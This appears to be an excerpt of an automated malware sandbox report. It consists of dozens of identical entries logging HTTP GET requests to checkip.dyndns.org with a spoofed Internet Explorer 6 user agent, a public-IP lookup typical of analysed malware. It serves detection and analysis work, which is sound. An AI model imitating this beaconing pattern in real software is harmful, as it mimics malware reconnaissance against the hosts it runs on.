Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
